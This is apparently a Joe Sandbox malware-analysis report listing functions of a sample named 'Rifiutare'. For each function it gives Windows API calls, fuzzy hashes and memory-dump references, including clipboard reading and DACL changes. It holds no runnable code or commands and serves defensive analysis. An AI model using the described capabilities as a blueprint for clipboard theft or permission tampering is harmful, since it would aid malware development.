MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00CCDBF4,00C913AC,00000000,00000000,00000000,?,00CCDBF4,00CCDBF4,?,00C312BF,00CCDBF4,?,?), ref: 00C3B37D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00C913AC,00000000,?,00000000,?,00CCDBF4,00CCDBF4,?,00C312BF,00CCDBF4,?,?), ref: 00C3B3B3

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 63ee3e7c57da3c5712be6c55bf4f9b178dbb1bed9380eae483e41d9eccf02cc2
Instruction ID: cc61ca3199a746f85c755600dad6bd686d33b29520adb8029eb1f835443f13c0
Opcode Fuzzy Hash: 63ee3e7c57da3c5712be6c55bf4f9b178dbb1bed9380eae483e41d9eccf02cc2
Instruction Fuzzy Hash: BC01F7753011007FEB18676ADC0BF7F7AADDB84350F14003DF602DA1E0EEA0AC009524

Function 00C38600 Relevance: 1.9, APIs: 1, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48fd82238ca6f3158e951d5dc527e0eec64837891e28552b4d6fe5ee93e96ab8
Instruction ID: 71347365583f667a968add2176af9a181969227fedf7a86278daaf04929bf6f8
Opcode Fuzzy Hash: 48fd82238ca6f3158e951d5dc527e0eec64837891e28552b4d6fe5ee93e96ab8
Instruction Fuzzy Hash: 2FF1BE75D2021A9BCF14DF94C891AFEB7B5FF04300F64812AF912A7290EF349A89DB55

Function 00C5F1B6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d857c04a35d56f08a6ee074db4c57e7e112e8b3860f17e98d1ecdafffdcdb4
Instruction ID: 1b45e648610122bd2dc36f89415f04fbbb7ee70bc2012dd5eb4b403c1833f234
Opcode Fuzzy Hash: 64d857c04a35d56f08a6ee074db4c57e7e112e8b3860f17e98d1ecdafffdcdb4
Instruction Fuzzy Hash: FF51D779A00208AFEB18CF58C844BAD7BA5EF85365F19816CEC589B3A1C731DD87C754

Function 00C32BE0 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3320E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3321A
Part of subcall function 00C3320E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C3322C
Part of subcall function 00C3320E: FreeLibrary.KERNEL32(00000000,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3323E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C32C12

Part of subcall function 00C331D7: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C331E0
Part of subcall function 00C331D7: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C331F2
Part of subcall function 00C331D7: FreeLibrary.KERNEL32(00000000,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C33205

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 7d9b642d7cf31ca2064cb3011229c1424fc5751e65f0438d0e6821c6e2864160
Instruction ID: 615ca456b167c5c16a631c7edff7675428859d5780142f819155866092a1845b
Opcode Fuzzy Hash: 7d9b642d7cf31ca2064cb3011229c1424fc5751e65f0438d0e6821c6e2864160
Instruction Fuzzy Hash: 9D110632610205ABDF25BF34DD02FAE77A5AF40711F10842DF552A71D1DE709B05BB90

Function 00C68822 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00C68860

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7c9f4400cd7eec457d2018fc328c1d42d40b7e8bb21a1057ef415371fe37fbf2
Instruction ID: 5ee0c5d97b5b7c218b30b67966533f53d4b8ac6ac3ce617f9ca298a1e26d5e91
Opcode Fuzzy Hash: 7c9f4400cd7eec457d2018fc328c1d42d40b7e8bb21a1057ef415371fe37fbf2
Instruction Fuzzy Hash: B8112A7590420AAFCF15DF98E98199B7BF4FF48310F104169F809AB351DA31EE15CB65

Function 00C384C0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00CCDBF4,00000000,?,?,00C32E8C,00CCDBF4,00010000,00000000,?,00000000,00000000), ref: 00C3851C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0c2da2dd0aecd07cb35bf8a99826c966c7caf4f25a7fee5829445c828de0a1f7
Instruction ID: e531dcaca482abfd444171854f814a6bcc57eaba26327a80488d38dc987229a3
Opcode Fuzzy Hash: 0c2da2dd0aecd07cb35bf8a99826c966c7caf4f25a7fee5829445c828de0a1f7
Instruction Fuzzy Hash: F61136312007069FE721CE06D890F66B7E9BF44364F14C42EE9AA8AA51CB70F949CB24

Function 00C345A6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C333F5,00D02408,?,?,?,?,?,?,?,00C3292D,?), ref: 00C345E7

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID:
API String ID: 4019309064-0
Opcode ID: ca7a74afcc3dccb51b4aa7a3413563d752853d980568d41b132bb7a0c30a4668
Instruction ID: 762a1d826b139f33d84c448369e3bad628ace28813094c1941d2cb9cb08b9917
Opcode Fuzzy Hash: ca7a74afcc3dccb51b4aa7a3413563d752853d980568d41b132bb7a0c30a4668
Instruction Fuzzy Hash: D6116171A242189BCB44EFA4D846EDA77B8AF08350F0040A5B959D7291DB70EB845B20

Function 00C5EA22 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
Instruction ID: 926cf6d37d074203f9faf9b202250b63640e6378c1e69f2171620494db3f5ff6
Opcode Fuzzy Hash: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
Instruction Fuzzy Hash: 96F07D3A500A1057C7353A758C0575A3B99AF42372F104715FC30D21C1CF70DA4FB6A9

Function 00CAF733 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00CAF770

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 3de67c64129edeb3b5033419ebba72a6e9ec3e77774bac3bb7bb4e3566cbd2bf
Instruction ID: 763212b73b90a72b424ada5d788555d8fce54da1b9131e6fb537f19989ceef4d
Opcode Fuzzy Hash: 3de67c64129edeb3b5033419ebba72a6e9ec3e77774bac3bb7bb4e3566cbd2bf
Instruction Fuzzy Hash: 43F0AF75600205BFCB00EBA4CC4AE9F7BB8EF4A720F000054F905EB260EA70EE85DB61

Function 00C63C40 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1e083dbb9a3475895865aa6a01548efe2c19f86dda6ff6cdb97bae1f2b46269b
Instruction ID: ff2186a47401917b8cf659c4b51089e65aecda289e6420269dc24c9e296001af
Opcode Fuzzy Hash: 1e083dbb9a3475895865aa6a01548efe2c19f86dda6ff6cdb97bae1f2b46269b
Instruction Fuzzy Hash: 3FE09B3220179576E73127B79D89F9E3A68AF427B0F150320FC25F6191DB60CF4052E4

Function 00C32C4E Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6947689e0fd1542ab650d32e01e208c5c074bd6902f22ec40e33b306820a29b
Instruction ID: aaba916ce3c41479d495603a21a1b569ac2681cb925724b689299292536d58cf
Opcode Fuzzy Hash: c6947689e0fd1542ab650d32e01e208c5c074bd6902f22ec40e33b306820a29b
Instruction Fuzzy Hash: 43F03971111712CFDB349F65E494C1ABBE4BF14325324C97EE1EA82610C7319984EF00

Function 00C32DAA Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C32DC8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction ID: bd2685b7f6f36cf90af4ded8f0cadbe62b317e2ab2ac96ae876b4676b33955c8
Opcode Fuzzy Hash: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction Fuzzy Hash: 95F0D47540020DBBDF05CF90C941A9A7B69FB04318F208585F9159A151C336EB61ABA1

Function 00C332E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C332FF

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 221c48251f4ce65b8184ecb452eedfa8739e6d0abd1a6e1982322605ab4ebec8
Instruction ID: f751ce81b3afd9c94bd49bc50ed06c59808f4194d74964d3470328ea02f1c16a
Opcode Fuzzy Hash: 221c48251f4ce65b8184ecb452eedfa8739e6d0abd1a6e1982322605ab4ebec8
Instruction Fuzzy Hash: 9FE0C272A002245BCB20A268DC06FEB77EDDFC8790F0440B5FD09D7358DA64ED80D690

Function 00C707BB Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00C70B25,?,?,00000000,?,00C70B25,00000000,0000000C), ref: 00C707D8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d0fa2b50aa2a094936bbcce040a7922f5cb2de8ca76108a4db04d172450cebea
Instruction ID: 3400c213ec2719326640004106f3db7297ffac022323ec30b5000ed77267b730
Opcode Fuzzy Hash: d0fa2b50aa2a094936bbcce040a7922f5cb2de8ca76108a4db04d172450cebea
Instruction Fuzzy Hash: A4D06C3200010DBBDF028F85DD06EDE3BAAFB48714F014050FE1856020C732E821AB90

Function 00C50090 Relevance: 1.3, APIs: 1, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00C5013F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 482031d3b9c732a802aa1122d8bc5508cbc9d3730c46073338753ea0c8616d1a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: A6310478A00505DFC718CF09C880A6AF7B5FB89301B3482A5E81ACB652D731EEC5CB95

Function 00C362AD Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,00C3111D,00CCDBF4), ref: 00C362CD

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 87bee83bef92cc57847a021510a5121381779d622ad7ebfc4c1bdc82c4b8170d
Instruction ID: 6a77a91beaab4b49de72ada3f343f8930d16736e90e2c606ff4eeb54f63764da
Opcode Fuzzy Hash: 87bee83bef92cc57847a021510a5121381779d622ad7ebfc4c1bdc82c4b8170d
Instruction Fuzzy Hash: FCE0B6B5410B02DFC3314F1AE804412FBF4FFE53617218A2ED4E682660D3B1598A8B50

Non-executed Functions

Function 00C913DC Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C9198E
Part of subcall function 00C91973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C9199A
Part of subcall function 00C91973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919A9
Part of subcall function 00C91973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919B0
Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C919C7

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C91446
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9147A
GetLengthSid.ADVAPI32(?), ref: 00C91491
GetAce.ADVAPI32(?,00000000,?), ref: 00C914CB
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C914E7
GetLengthSid.ADVAPI32(?), ref: 00C914FE
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C91506
HeapAlloc.KERNEL32(00000000), ref: 00C9150D
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9152E
CopySid.ADVAPI32(00000000), ref: 00C91535
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C91564
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C91586
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C91598
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915BF
HeapFree.KERNEL32(00000000), ref: 00C915C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915CF
HeapFree.KERNEL32(00000000), ref: 00C915D6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915DF
HeapFree.KERNEL32(00000000), ref: 00C915E6
GetProcessHeap.KERNEL32(00000000,?), ref: 00C915F2
HeapFree.KERNEL32(00000000), ref: 00C915F9

Part of subcall function 00C91A0D: GetProcessHeap.KERNEL32(00000008,00C9142B,?,00000000,?,00C9142B,?), ref: 00C91A1B
Part of subcall function 00C91A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C9142B,?), ref: 00C91A22
Part of subcall function 00C91A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C9142B,?), ref: 00C91A31

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 5b5c03494bf6cb7aa7bc5aa2788607db09dd263fc7a3a7427499820ff556efc8
Instruction ID: 6a11ad2155bb12b6446417eb28fe58571ada93c6a5a01abff44fc5f220564ab7
Opcode Fuzzy Hash: 5b5c03494bf6cb7aa7bc5aa2788607db09dd263fc7a3a7427499820ff556efc8
Instruction Fuzzy Hash: 3F71207290020AAFDF10DFA5DC49FEEBBB8BF44311F1A4125F916A7191D7719A05CBA0

Function 00CAF345 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00CCDBF4), ref: 00CAF36F
IsClipboardFormatAvailable.USER32(0000000D), ref: 00CAF37D
GetClipboardData.USER32(0000000D), ref: 00CAF389
CloseClipboard.USER32 ref: 00CAF395
GlobalLock.KERNEL32(00000000), ref: 00CAF3CD
CloseClipboard.USER32 ref: 00CAF3D7
GlobalUnlock.KERNEL32(00000000), ref: 00CAF402
IsClipboardFormatAvailable.USER32(00000001), ref: 00CAF40F
GetClipboardData.USER32(00000001), ref: 00CAF417
GlobalLock.KERNEL32(00000000), ref: 00CAF428
GlobalUnlock.KERNEL32(00000000), ref: 00CAF468
IsClipboardFormatAvailable.USER32(0000000F), ref: 00CAF47E
GetClipboardData.USER32(0000000F), ref: 00CAF48A
GlobalLock.KERNEL32(00000000), ref: 00CAF49B
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00CAF4BD
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CAF4DA
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CAF518
GlobalUnlock.KERNEL32(00000000), ref: 00CAF539
CountClipboardFormats.USER32 ref: 00CAF55A
CloseClipboard.USER32 ref: 00CAF59F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
